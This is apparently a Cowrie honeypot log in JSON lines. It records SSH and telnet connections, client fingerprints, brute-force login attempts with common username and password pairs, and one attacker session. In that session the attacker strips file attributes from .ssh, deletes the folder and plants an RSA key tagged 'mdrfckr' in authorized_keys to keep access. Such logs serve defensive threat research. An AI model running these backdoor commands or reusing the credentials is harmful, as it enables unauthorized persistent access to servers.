{"eventid":"cowrie.client.kex","hassh":"e788c657d1a22971d5026526ffd2e918","hasshAlgorithms":"diffie-hellman-group1-sha1,diffie-hellman-group14-sha1,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;aes128-cbc,3des-cbc,blowfish-cbc,aes192-cbc,aes256-cbc,aes128-ctr,aes192-ctr,aes256-ctr;hmac-md5,hmac-sha1,hmac-ripemd160;none","kexAlgs":["diffie-hellman-group1-sha1","diffie-hellman-group14-sha1","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-ed25519"],"encCS":["aes128-cbc","3des-cbc","blowfish-cbc","aes192-cbc","aes256-cbc","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-md5","hmac-sha1","hmac-ripemd160"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: e788c657d1a22971d5026526ffd2e918","sensor":"my-vps","timestamp":"2025-09-09T04:52:00.148418Z","src_ip":"172.105.246.139","session":"ec42e64fa55b"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:52:00.365175Z","src_ip":"172.105.246.139","session":"ec42e64fa55b"}
{"eventid":"cowrie.session.connect","src_ip":"92.118.39.62","src_port":46352,"dst_ip":"1.2.3.4","dst_port":22,"session":"fcf575cb08c8","protocol":"ssh","message":"New connection: 92.118.39.62:46352 (1.2.3.4:22) [session: fcf575cb08c8]","sensor":"my-vps","timestamp":"2025-09-09T04:52:02.618551Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T04:52:02.619512Z","src_ip":"92.118.39.62","session":"fcf575cb08c8"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-09-09T04:52:02.649392Z","src_ip":"92.118.39.62","session":"fcf575cb08c8"}
{"eventid":"cowrie.login.failed","username":"airflow","password":"123456","message":"login attempt [airflow/123456] failed","sensor":"my-vps","timestamp":"2025-09-09T04:52:02.743382Z","src_ip":"92.118.39.62","session":"fcf575cb08c8"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:52:03.775350Z","src_ip":"92.118.39.62","session":"fcf575cb08c8"}
{"eventid":"cowrie.session.connect","src_ip":"47.236.146.107","src_port":43530,"dst_ip":"1.2.3.4","dst_port":23,"session":"7330366875b1","protocol":"telnet","message":"New connection: 47.236.146.107:43530 (1.2.3.4:23) [session: 7330366875b1]","sensor":"my-vps","timestamp":"2025-09-09T04:52:23.489650Z"}
{"eventid":"cowrie.session.connect","src_ip":"102.68.86.62","src_port":47116,"dst_ip":"1.2.3.4","dst_port":22,"session":"e7843a9812a6","protocol":"ssh","message":"New connection: 102.68.86.62:47116 (1.2.3.4:22) [session: e7843a9812a6]","sensor":"my-vps","timestamp":"2025-09-09T04:52:32.538311Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:52:32.539230Z","src_ip":"102.68.86.62","session":"e7843a9812a6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:52:32.708652Z","src_ip":"102.68.86.62","session":"e7843a9812a6"}
{"eventid":"cowrie.login.success","username":"root","password":"qaz@12345","message":"login attempt [root/qaz@12345] succeeded","sensor":"my-vps","timestamp":"2025-09-09T04:52:33.440709Z","src_ip":"102.68.86.62","session":"e7843a9812a6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:52:33.831178Z","src_ip":"102.68.86.62","session":"e7843a9812a6"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T04:52:33.831866Z","src_ip":"102.68.86.62","session":"e7843a9812a6"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T04:52:33.832791Z","src_ip":"102.68.86.62","session":"e7843a9812a6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:52:34.002281Z","src_ip":"102.68.86.62","session":"e7843a9812a6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:52:34.421727Z","src_ip":"102.68.86.62","session":"e7843a9812a6"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T04:52:34.422403Z","src_ip":"102.68.86.62","session":"e7843a9812a6"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T04:52:34.695976Z","src_ip":"102.68.86.62","session":"e7843a9812a6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:52:34.696812Z","src_ip":"102.68.86.62","session":"e7843a9812a6"}
{"eventid":"cowrie.session.connect","src_ip":"102.68.86.62","src_port":47126,"dst_ip":"1.2.3.4","dst_port":22,"session":"e5dbea0c1d70","protocol":"ssh","message":"New connection: 102.68.86.62:47126 (1.2.3.4:22) [session: e5dbea0c1d70]","sensor":"my-vps","timestamp":"2025-09-09T04:52:40.997114Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:52:40.997977Z","src_ip":"102.68.86.62","session":"e5dbea0c1d70"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:52:41.265020Z","src_ip":"102.68.86.62","session":"e5dbea0c1d70"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T04:52:42.290517Z","src_ip":"102.68.86.62","session":"e5dbea0c1d70"}
{"eventid":"cowrie.session.closed","duration":"9.9","message":"Connection lost after 9.9 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:52:42.470263Z","src_ip":"102.68.86.62","session":"e7843a9812a6"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:52:42.471663Z","src_ip":"102.68.86.62","session":"e5dbea0c1d70"}
{"eventid":"cowrie.session.closed","duration":30.603737592697144,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:52:54.093318Z","src_ip":"47.236.146.107","session":"7330366875b1"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":54870,"dst_ip":"1.2.3.4","dst_port":22,"session":"0bb952b97916","protocol":"ssh","message":"New connection: 217.72.205.35:54870 (1.2.3.4:22) [session: 0bb952b97916]","sensor":"my-vps","timestamp":"2025-09-09T04:54:03.274197Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:54:03.275324Z","src_ip":"217.72.205.35","session":"0bb952b97916"}
{"eventid":"cowrie.session.connect","src_ip":"102.68.86.62","src_port":43426,"dst_ip":"1.2.3.4","dst_port":22,"session":"8bedf982b56d","protocol":"ssh","message":"New connection: 102.68.86.62:43426 (1.2.3.4:22) [session: 8bedf982b56d]","sensor":"my-vps","timestamp":"2025-09-09T04:54:36.787999Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:54:36.789001Z","src_ip":"102.68.86.62","session":"8bedf982b56d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:54:37.343395Z","src_ip":"102.68.86.62","session":"8bedf982b56d"}
{"eventid":"cowrie.login.failed","username":"redis","password":"1234","message":"login attempt [redis/1234] failed","sensor":"my-vps","timestamp":"2025-09-09T04:54:39.710347Z","src_ip":"102.68.86.62","session":"8bedf982b56d"}
{"eventid":"cowrie.session.closed","duration":"4.4","message":"Connection lost after 4.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:54:41.223967Z","src_ip":"102.68.86.62","session":"8bedf982b56d"}
{"eventid":"cowrie.session.connect","src_ip":"102.68.86.62","src_port":44838,"dst_ip":"1.2.3.4","dst_port":22,"session":"6a94217eef81","protocol":"ssh","message":"New connection: 102.68.86.62:44838 (1.2.3.4:22) [session: 6a94217eef81]","sensor":"my-vps","timestamp":"2025-09-09T04:56:41.573107Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:56:41.573758Z","src_ip":"102.68.86.62","session":"6a94217eef81"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:56:41.769080Z","src_ip":"102.68.86.62","session":"6a94217eef81"}
{"eventid":"cowrie.login.failed","username":"test","password":"Test1234","message":"login attempt [test/Test1234] failed","sensor":"my-vps","timestamp":"2025-09-09T04:56:42.583418Z","src_ip":"102.68.86.62","session":"6a94217eef81"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:56:43.804647Z","src_ip":"102.68.86.62","session":"6a94217eef81"}
{"eventid":"cowrie.session.connect","src_ip":"122.194.9.203","src_port":2932,"dst_ip":"1.2.3.4","dst_port":23,"session":"ccb67f563650","protocol":"telnet","message":"New connection: 122.194.9.203:2932 (1.2.3.4:23) [session: ccb67f563650]","sensor":"my-vps","timestamp":"2025-09-09T04:56:57.462290Z"}
{"eventid":"cowrie.session.closed","duration":12.623530149459839,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:57:10.085749Z","src_ip":"122.194.9.203","session":"ccb67f563650"}
{"eventid":"cowrie.session.connect","src_ip":"122.194.9.203","src_port":56369,"dst_ip":"1.2.3.4","dst_port":23,"session":"f8c1279b92ff","protocol":"telnet","message":"New connection: 122.194.9.203:56369 (1.2.3.4:23) [session: f8c1279b92ff]","sensor":"my-vps","timestamp":"2025-09-09T04:57:10.257730Z"}
{"eventid":"cowrie.session.closed","duration":12.836213111877441,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:57:23.093880Z","src_ip":"122.194.9.203","session":"f8c1279b92ff"}
{"eventid":"cowrie.session.connect","src_ip":"122.194.9.203","src_port":45282,"dst_ip":"1.2.3.4","dst_port":23,"session":"097248ae7496","protocol":"telnet","message":"New connection: 122.194.9.203:45282 (1.2.3.4:23) [session: 097248ae7496]","sensor":"my-vps","timestamp":"2025-09-09T04:57:23.297388Z"}
{"eventid":"cowrie.session.closed","duration":12.81374216079712,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:57:36.111064Z","src_ip":"122.194.9.203","session":"097248ae7496"}
{"eventid":"cowrie.session.connect","src_ip":"122.97.209.175","src_port":22731,"dst_ip":"1.2.3.4","dst_port":23,"session":"f06a5c32053b","protocol":"telnet","message":"New connection: 122.97.209.175:22731 (1.2.3.4:23) [session: f06a5c32053b]","sensor":"my-vps","timestamp":"2025-09-09T04:57:36.300839Z"}
{"eventid":"cowrie.session.closed","duration":12.818135738372803,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:57:49.118877Z","src_ip":"122.97.209.175","session":"f06a5c32053b"}
{"eventid":"cowrie.session.connect","src_ip":"122.97.209.175","src_port":26571,"dst_ip":"1.2.3.4","dst_port":23,"session":"324f8de912e2","protocol":"telnet","message":"New connection: 122.97.209.175:26571 (1.2.3.4:23) [session: 324f8de912e2]","sensor":"my-vps","timestamp":"2025-09-09T04:57:49.281959Z"}
{"eventid":"cowrie.session.closed","duration":12.806019067764282,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:58:02.087914Z","src_ip":"122.97.209.175","session":"324f8de912e2"}
{"eventid":"cowrie.session.connect","src_ip":"122.97.209.175","src_port":6697,"dst_ip":"1.2.3.4","dst_port":23,"session":"03172d785404","protocol":"telnet","message":"New connection: 122.97.209.175:6697 (1.2.3.4:23) [session: 03172d785404]","sensor":"my-vps","timestamp":"2025-09-09T04:58:02.291583Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60224,"dst_ip":"1.2.3.4","dst_port":22,"session":"575e4891f923","protocol":"ssh","message":"New connection: 212.227.235.229:60224 (1.2.3.4:22) [session: 575e4891f923]","sensor":"my-vps","timestamp":"2025-09-09T04:58:14.019583Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T04:58:14.020496Z","src_ip":"212.227.235.229","session":"575e4891f923"}
{"eventid":"cowrie.client.kex","hassh":"f1e5e9d24e5e345e8745613bde22d532","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f1e5e9d24e5e345e8745613bde22d532","sensor":"my-vps","timestamp":"2025-09-09T04:58:14.125518Z","src_ip":"212.227.235.229","session":"575e4891f923"}
{"eventid":"cowrie.client.fingerprint","username":"admin","fingerprint":"57:65:00:37:e8:a9:fd:9f:75:7a:f5:2c:77:c3:4d:41","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQDFO/EFQQxBqSY+X93ECTUYQLxAzf5s0pnaOu4RZPmSGn17b7Kixa8j2BKOu/mL1nvfBuuYohdihdT7RVaEJDPg7lKbsGUDhaH6ifEH0ADYTjx81jzOaPC0gyiYuVZKqt2nAHAP0a7oiJq0g6HZ4f3fMD1a369pQofomOjTq3cbXvLOSiuEq1pDfRmNSMM0m6BDiRhpqR9kSF2t0zY4hpmN+v1AamfNRtJ1LDXoSGJW8kl5/LAnoJEDHaycNtAPUsMpAgpxfY/nMOjTvlZEHbA7SlnC36Cpw9RELDK5zipMUNuptUpZHEfO7j8OrhW98C5BGoTjk8L5UXQ/lPahsXyd+/4ztpO4yVjLR40leD5SvsM8HSOEC8t70VL3FCdoT5tcU9Td5XY+WpJ98EE1tBpdvyKV69co39DEqQPdT0j073SUtc5rduy6JQnvs+E3VhI6ZVoT0TydJkhfjNOykBLo+2UBEHCIKr1YTRewYsgtjCl3r3oWdZ06YuLrrYt7Ih4N/WHIjVgfzzryvs0xhglWxpfQRl/upz1PUEedGm/j8g+osJyl+4XR+neJWITg1jfnjzHuCyaUarOTwysJ9KjSdxYG1YrsZr+OzGoSF2YtusJd+Dl9mLQ7Io4jsrUslUre67Ym0Dj9PDRDhmCED6HR7BimwA9QtMg/MZlH4BelUQ==","type":"ssh-rsa","message":"public key attempt for user admin of type ssh-rsa with fingerprint 57:65:00:37:e8:a9:fd:9f:75:7a:f5:2c:77:c3:4d:41","sensor":"my-vps","timestamp":"2025-09-09T04:58:14.327492Z","src_ip":"212.227.235.229","session":"575e4891f923"}
